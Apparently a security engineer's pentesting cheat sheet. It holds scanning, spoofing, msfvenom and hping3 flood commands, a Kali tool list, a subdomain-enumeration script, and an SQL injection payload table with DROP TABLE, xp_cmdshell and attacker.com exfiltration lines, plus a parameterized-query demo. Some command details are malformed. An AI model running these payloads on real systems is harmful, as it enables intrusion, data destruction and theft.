🖋 PenFlo
Cloud_enum
Usage: let's say you were researching "somecompany", whose website is "somecompany.io" and which makes a product called "blockchaindoohickey". You could run the tool like this:
```
cloudenum.py -k somecompany -k somecompany.io -k blockchaindoohickey
```
(root㉿odus)-[~/ITWSV]
./update.sh
sniper -t 169.0.229.126 -fp
nuclei -u domain.tld -sa
amass [enum] [intel] -d <target>
theHarvester -d <target> -b all #Use IP's here to scan in nmap
nmap -sS -sV <-sC> -Pn --script vuln <target> -d <spoodomain> --spoof-mac B3-67-YT-MA-N8-09
msfvenom -p <payload> LHOST=<target> -f <filetype> -o <saveas>
nslookup enum
host -l <domain> <ns>   # zone transfer attempt against a specific name server
hping3 -i --flood -n -V -2 -a <--rand-dest> -f -U -R -j
SHODAN API key: <redacted>
Locate all .bat files under C:\ (PowerShell):
```powershell
# Short pause before the scan starts
Start-Sleep -Seconds 5
# Recurse the whole drive, including hidden/system entries, and report each match
Get-ChildItem -Path C:\ -Filter *.bat -Recurse -Force -Verbose
```
https://github.com/topics/kali-linux-hacking
https://vulners.com/cbl_mariner/CBLMARINER:13208
https://incogniton.com/download-incogniton/
| # | Pattern/Technique | Description | Example |
|---|---|---|---|
| 1 | Tautology-Based Injection | Injecting tautological conditions to bypass authentication or extract data | `OR '1'='1` |
| 2 | Union-Based Injection | Using the UNION SQL operator to combine the results of two or more SELECT statements | `; UNION SELECT username, password FROM users--` |
| 3 | Error-Based Injection | Forcing the database to generate an error that reveals information | `; SELECT * FROM users WHERE id=1 AND 1=CONVERT(int, (SELECT @@version))--` |
| 4 | Blind SQL Injection | Extracting data based on true/false responses | `AND 1=(SELECT CASE WHEN (username='admin') THEN 1 ELSE 0 END)--` |
| 5 | Time-Based Blind Injection | Using time delays to infer information | `AND IF(1=1, SLEEP(5), 0)--` |
| 6 | Second-Order Injection | Injecting malicious SQL code that gets executed in a subsequent query | `INSERT INTO users (username) VALUES ('admin'); -- Then later used in another query` |
| 7 | Stacked Queries | Executing multiple SQL queries in one statement | `; DROP TABLE users;--` |
| 8 | Out-of-Band Injection | Using features like DNS or HTTP to exfiltrate data | `; EXEC master..xp_dirtree '\\attacker.com\share'--` |
| 9 | Conditional Errors | Using conditional statements to generate errors revealing data | `; SELECT CASE WHEN (1=1) THEN 1/0 ELSE 1 END--` |
| 10 | Boolean-Based Blind | Using boolean conditions to infer information | `AND (SELECT SUBSTRING(password, 1, 1) FROM users WHERE username='admin')='a'--` |
| 11 | Hexadecimal Encoding | Using hex-encoded values in injection | `; UNION SELECT 0x70617373776f7264--` |
| 12 | Comment Injection | Terminating legitimate SQL statements with comments | `OR '1'='1'--` |
| 13 | Function Call Injection | Calling database functions to exploit vulnerabilities | `; EXEC xp_cmdshell('dir')--` |
| 14 | Variable Manipulation | Modifying session or application variables to influence SQL queries | `; @var = '1'; EXEC('SELECT * FROM users WHERE id=' + @var)--` |
| 15 | Batched Queries | Injecting multiple queries in one statement | `; SELECT * FROM users; DROP TABLE logs;--` |
| 16 | Metadata Injection | Extracting database metadata information | `; SELECT table_name FROM information_schema.tables--` |
| 17 | XML Injection | Injecting SQL through XML data processing | `</tag><tag>'); DROP TABLE users;--` |
| 18 | Cookie-Based Injection | Injecting SQL through manipulated cookies | `cookie='; DROP TABLE users;--` |
| 19 | Header-Based Injection | Injecting SQL through manipulated HTTP headers | `User-Agent: '; DROP TABLE users;--` |
| 20 | Direct OS Command Injection | Using SQL to execute OS commands | `; EXEC xp_cmdshell('shutdown -s')--` |
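Rows 1 and 12 of the table (tautology and comment injection) only work when user input is spliced into the SQL text. This added example, which is not part of the original notes, runs both payloads against a constructed SQLite `users` table through a string-built login query and a parameterized one, so the difference shows up in the rows each query returns.

```python
import sqlite3


def make_db():
    # Constructed in-memory sample table; the rows are made up for this example.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    # String concatenation: whatever the caller supplies becomes part of the SQL text.
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}' ORDER BY username")
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, username, password):
    # Placeholders bind the input as data; quotes, OR and -- are compared literally.
    sql = ("SELECT username FROM users WHERE username = ? AND password = ? "
           "ORDER BY username")
    return [row[0] for row in conn.execute(sql, (username, password))]


def demo():
    conn = make_db()
    tautology = "' OR '1'='1"   # row 1: closes the quote, appends an always-true condition
    commented = "admin'--"      # row 12: closes the quote, comments out the password check
    return {
        "vuln_tautology": login_vulnerable(conn, "x", tautology),      # every row
        "vuln_comment": login_vulnerable(conn, commented, "whatever"),  # admin, no password
        "safe_tautology": login_parameterized(conn, "x", tautology),   # no rows
        "safe_comment": login_parameterized(conn, commented, "whatever"),  # no rows
        "safe_legit": login_parameterized(conn, "alice", "hunter2"),   # real credentials
    }


if __name__ == "__main__":
    for case, rows in demo().items():
        print(f"{case}: {rows}")
```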
above/kali-rolling 2.6-0kali1 all
Invisible protocol sniffer for finding vulnerabilities in the network
amap/kali-rolling 5.4-4kali3 amd64
next-generation scanning tool for pentesters
arjun/kali-rolling 2.2.2-1 all
HTTP parameter discovery suite
bruteforce-salted-openssl/kali-rolling 1.4.2-4+b1 amd64
try to find the passphrase for files encrypted with OpenSSL
cloud-enum/kali-rolling 0.7-3 all
Multi-cloud open source intelligence tool
crackmapexec/kali-rolling,now 5.4.0-0kali5 all [installed,automatic]
Swiss army knife for pentesting networks
dnsenum/kali-rolling 1.3.2-1 all
tool to enumerate domain DNS information
dnsmap/kali-rolling 0.36-3 amd64
DNS domain name brute forcing tool
evil-winrm/kali-rolling 3.5-0kali1 all
ultimate WinRM shell for hacking/pentesting
fcrackzip/kali-rolling 1.0-11 amd64
password cracker for zip archives
ffuf/kali-rolling 2.1.0-1 amd64
Fast web fuzzer written in Go (program)
firewalk/kali-rolling 5.0-5+b1 amd64
active reconnaissance network security tool
forensics-all/kali-rolling 3.51 all
Debian Forensics Environment - essential components (metapackage)
forensics-all-gui/kali-rolling 3.51 all
Debian Forensics Environment - GUI components (metapackage)
forensics-extra/kali-rolling 2.53 all
Forensics Environment - extra console components (metapackage)
forensics-extra-gui/kali-rolling 2.53 all
Forensics Environment - extra GUI components (metapackage)
forensics-full/kali-rolling 2.53 all
Full forensics station (metapackage)
gobuster/kali-rolling 3.6.0-1+b1 amd64
Directory/file & DNS busting tool written in Go
goldeneye/kali-rolling 1.2.0+git20191230-2 all
HTTP DoS test tool
hunt/kali-rolling 1.5-9 amd64
advanced packet sniffer and connection intrusion
ibombshell/kali-rolling 0~git20201107-0kali2 all
Dynamic Remote Shell
ident-user-enum/kali-rolling 1.0-0kali3 all
Query ident to determine the owner of a TCP network process
isr-evilgrade/kali-rolling 2.0.9-0kali2 all
Evilgrade framework
kali-debtags/now 0.4 all [installed,local]
Kali-specific debtags
laudanum/kali-rolling 1.0+r36-0kali6 all
Collection of injectable web files
libopentest4j-java/kali-rolling 1.2.0-4 all
Open Test Alliance API
libopentest4j-reporting-java/kali-rolling 0.1.0-M1-2 all
Open Test Reporting
ligolo-ng/kali-rolling 0.5.2-0kali2 amd64
Advanced, yet simple, tunneling/pivoting tool that uses a TUN interface
mitm6/kali-rolling 0.3.0-0kali1 all
pwning IPv4 via IPv6
netdiscover/kali-rolling 0.10-3+b1 amd64
active/passive network address scanner using ARP requests
packetsender/kali-rolling 8.6.5-1 amd64
Utility for sending and receiving TCP, UDP, SSL, HTTP packets
packit/kali-rolling 1.8.1-1+b1 amd64
network packet generator and capture tool
payloadsallthethings/kali-rolling 2.1-0kali2 amd64
Collection of useful payloads and bypasses
pompem/kali-rolling,now 0.2.0-6 all [installed]
Exploit and Vulnerability Finder
proxycheck/kali-rolling 0.49a-8 amd64
checks existence of open proxy
python-pyric-doc/kali-rolling 0.1.6+git20191210-0kali1 all
Wireless library for Linux (common documentation)
python3-ajpy/kali-rolling 0.0.5-2 all
Python module to craft AJP requests
python3-ldapdomaindump/kali-rolling,now 0.9.4-2 all [installed,automatic]
Active Directory information dumper via LDAP (Python 3)
python3-pyric/kali-rolling 0.1.6+git20191210-0kali1 all
Wireless library for Linux (Python 3)
redeye/kali-rolling 0.0~git20230722.347f493-0kali2 all
tool to help you manage your data during a pentest operation
redsnarf/kali-rolling 0~git20170822-0kali5 all
Pentesting tool for retrieving credentials from Windows workstations
rekono-kbx/kali-rolling 1.6.6 amd64
automation platform for pentesting
windows-binaries/kali-rolling 0.6.10 all
Various pentesting Windows binaries
winregfs/kali-rolling 0.7-5 amd64
Windows registry FUSE filesystem
https://catalog.workshops.aws/serverless-patterns/en-US/initial-setup
https://docs.aws.amazon.com/lambda/latest/dg/best-practices.html
https://docs.pwncat.org/en/latest/usage/portscanning.html
To create a PowerShell script that enumerates subdomains of a given site and outputs the results to an HTML file, you can follow these steps. We will use the `Resolve-DnsName` cmdlet to look up each candidate name from a short wordlist of common subdomains. Here's an example script:
### Step 1: Define the Script
```powershell
# Define the target domain
$targetDomain = "example.com"

# Define the list of common subdomains to check
$subdomains = @("www", "mail", "blog", "shop", "dev", "api", "test", "staging", "beta")

# Initialize an array to hold the results
$results = @()

# Enumerate subdomains
foreach ($subdomain in $subdomains) {
    $fullDomain = "$subdomain.$targetDomain"
    try {
        $response = Resolve-DnsName -Name $fullDomain -Type A -ErrorAction Stop
        # A CNAME answer comes back together with the A records it points to;
        # keep only the A records so the IP Address column is never empty.
        $addresses = ($response | Where-Object { $_.Type -eq 'A' }).IPAddress -join ', '
        if ($addresses) {
            $results += [PSCustomObject]@{
                Subdomain = $fullDomain
                IPAddress = $addresses
            }
        }
    } catch {
        # Name did not resolve (NXDOMAIN or lookup error): skip it
    }
}

# Generate HTML output (the closing "@ of a here-string must start at column 0)
$html = @"
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Subdomain Enumeration Results</title>
<style>
table {
    width: 100%;
    border-collapse: collapse;
}
table, th, td {
    border: 1px solid black;
}
th, td {
    padding: 10px;
    text-align: left;
}
th {
    background-color: #f2f2f2;
}
</style>
</head>
<body>
<h1>Subdomain Enumeration Results for $targetDomain</h1>
<table>
<tr>
<th>Subdomain</th>
<th>IP Address</th>
</tr>
"@

foreach ($result in $results) {
    $html += @"
<tr>
<td>$($result.Subdomain)</td>
<td>$($result.IPAddress)</td>
</tr>
"@
}

$html += @"
</table>
</body>
</html>
"@

# Output HTML to file
$outputFile = "subdomains_$($targetDomain).html"
$html | Out-File -FilePath $outputFile -Encoding utf8
Write-Host "Subdomain enumeration completed. Results saved to $outputFile"
```
### Step 2: Run the Script
1. Open PowerShell.
2. Copy and paste the script into your PowerShell console or save it as a `.ps1` file (e.g., `EnumerateSubdomains.ps1`).
3. Execute the script by running:
```powershell
.\EnumerateSubdomains.ps1
```
### Explanation
- The script defines a list of common subdomains to check against the target domain.
- It uses `Resolve-DnsName` to check if each subdomain exists.
- If a subdomain exists, it stores the subdomain and its IP address in an array.
- The script then generates an HTML file containing the results, formatted in a table.
- Finally, the script outputs the HTML to a file named `subdomains_<targetDomain>.html`.
https://cyberdefenders.org/online-labs/6133c324-7aef-4a75-b1ad-91f92e799ac3/
Curtis Jones, Durham, NC,
Sr. Security Engineer - IAM / Integration Security Consultant
Punctuality, Politeness, and Professionalism are paramount